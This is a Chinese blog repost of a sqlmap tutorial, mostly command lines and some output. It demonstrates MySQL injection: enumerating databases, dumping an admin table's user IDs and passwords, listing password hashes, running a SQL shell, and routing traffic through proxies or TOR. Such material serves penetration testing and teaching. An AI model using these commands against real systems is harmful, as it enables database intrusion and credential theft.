安裝教程百度一下就有了.

首先下載需要的文件，如果是windows環境直接到

看大牛的視頻，學習一下，附上截圖....算是轉載吧...只是為了分享一下..

下邊是實例：

sqlmap.py -update 更新

-h help

sqlmap.py -u --dbms "Mysql" --current-user

/* 注解：獲取當前用戶名稱

current user: ’root@localhost’

sqlmap.py -u --dbms "Mysql" --current-db

/*當前數據庫

current database: ’wepost’

sqlmap.py -u --dbms "Mysql" --tables -D "wepost"

sqlmap.py -u --dbms "Mysql" --columns

-T "admin" -D "wepost"

sqlmap.py -u --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*獲取字段里面的內容

?

sqlmap簡單中文說明

更新

svn checkout sqlmap-dev

sqlmap.py -u "" -v 1 --sql-shell //執行SQL語句

sqlmap.py -u "" -v 5 //更詳細的信息

load options from a configuration INI file

sqlmap -c sqlmap.conf

使用POST方法提交

sqlmap.py -u "" --method POST --data "id=1"

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData來抓cookies

python sqlmap.py -u "" --cookie "id=1" -v 1

使用referer欺騙

python sqlmap.py -u "" --referer "" -v 3

使用自定義user-agent,或者使用隨機使用自帶的user-agents.txt

python sqlmap.py -u "" --user-agent "Mozilla/4.0 compatible; MSIE 7.0; Windows NT 5.1" -v 3

python sqlmap.py -u "" -v 1 -a "./txt/user-agents.txt"

使用基本認證

python sqlmap.py -u "" --auth-type Basic --auth-cred "" -v 3

使用Digest認證

python sqlmap.py -u "" --auth-type Digest --auth-cred "" -v 3

使用代理,配合TOR

python sqlmap.py -u "" --proxy ""

python sqlmap.py -u "" --proxy ""

使用多線程猜解

python sqlmap.py -u "" -v 1 --current-user --threads 3

繞過動態檢測,直接指定有注入點的參數,可以使用,分割多個參數,指定user-agent注入

python sqlmap.py -u "" -v 1 -p "id

python sqlmap.py -u "" -v 1 -p "cat,id"

python sqlmap.py -u "" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 "

指定數據庫,繞過SQLMAP的自動檢測

python sqlmap.py -u "" -v 2 --dbms "PostgreSQL"

* MySQL

* Oracle

* PostgreSQL

* Microsoft SQL Server

指定操作系統,繞過SQLMAP自動檢測

python sqlmap.py -u "" -v 2 --os "Windows"

* Linux

* Windows

自定義payload

Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "SELECT * FROM users WHERE id=’" . $_GET[’id’] . "’ LIMIT 0, 1";:

$ python sqlmap.py -u "" -v 3 -p "id" --prefix "’" --postfix "AND ’test’=’test"

[...]

[] [INFO] testing sql injection on GET parameter ’id’ with 0 parenthesis

[] [INFO] testing custom injection on GET parameter ’id’

[] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20

%28%27test%27=%27test HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: 192.168.1.121:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.7rc1

Connection: close

[...]

[] [INFO] GET parameter ’id’ is custom injectable

[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1’ AND 7433=7433 AND ’test’=’test

and makes the query syntatically correct to the page query:

SELECT * FROM users WHERE id=’1’ AND 7433=7433 AND ’test’=’test’ LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

頁面比較

python sqlmap.py -u "" --string "luther" -v 1

python sqlmap.py -u "" --regexp "

lu[/w][/w]er" -v

排除網站的內容

python sqlmap.py -u "" --excl-reg "Dynamic content: [/d]+"

多語句測試，php內嵌函數mysql_query,不支持多語句

python sqlmap.py -u "" --stacked-test -v 1

union注入測試

python sqlmap.py -u "" --union-test -v 1

unionz注入配合orderby

python sqlmap.py -u "" --union-test --union-tech orderby -v 1

python sqlmap.py -u "" -v 1 --union-use --banner

python sqlmap.py -u "" -v 5 --union-use --current-user

python sqlmap.py -u "" -v 1 --union-use --dbs

fingerprint

python sqlmap.py -u "" -v 1 -f

python sqlmap.py -u "" -v 1 -f -b

判斷當前用戶是否是dba

python sqlmap.py -u "" --is-dba -v 1

列舉數據庫用戶

python sqlmap.py -u "" --users -v 0

列舉數據庫用戶密碼

python sqlmap.py -u "" --passwords -v 0

python sqlmap.py -u "" --passwords -U sa -v 0

查看用戶權限

python sqlmap.py -u "" --privileges -v 0

python sqlmap.py -u "" --privileges -U postgres -v 0

列數據庫

python sqlmap.py -u "" --dbs -v 0

列出指定數據庫指定表的列名

python sqlmap.py -u "" --columns -T users -D test -v 1

列出指定數據庫的指定表的指定列的內容

python sqlmap.py -u "" --dump -T users -D master -C surname -v 0

指定列的范圍從2－4

python sqlmap.py -u "" --dump -T users -D test --start 2 --stop 4 -v 0

導出所有數據庫，所有表的內容

python sqlmap.py -u "" --dump-all -v 0

只列出用戶自己新建的數據庫和表的內容

python sqlmap.py -u "" --dump-all --exclude-sysdbs -v 0

sql query

python sqlmap.py -u "" --sql-query "SELECT usename FROM pg_user" -v 0

python sqlmap.py -u "" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

保存和恢復會話

python sqlmap.py -u "" -b -v 1 -s "sqlmap.log"

保存選項到INC配置文件

python sqlmap.py -u "" -b -v 1 --save

總結

以上是生活随笔為你收集整理的sqlmap mysql案例_sqlmap简单mysql注入演示附截图的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。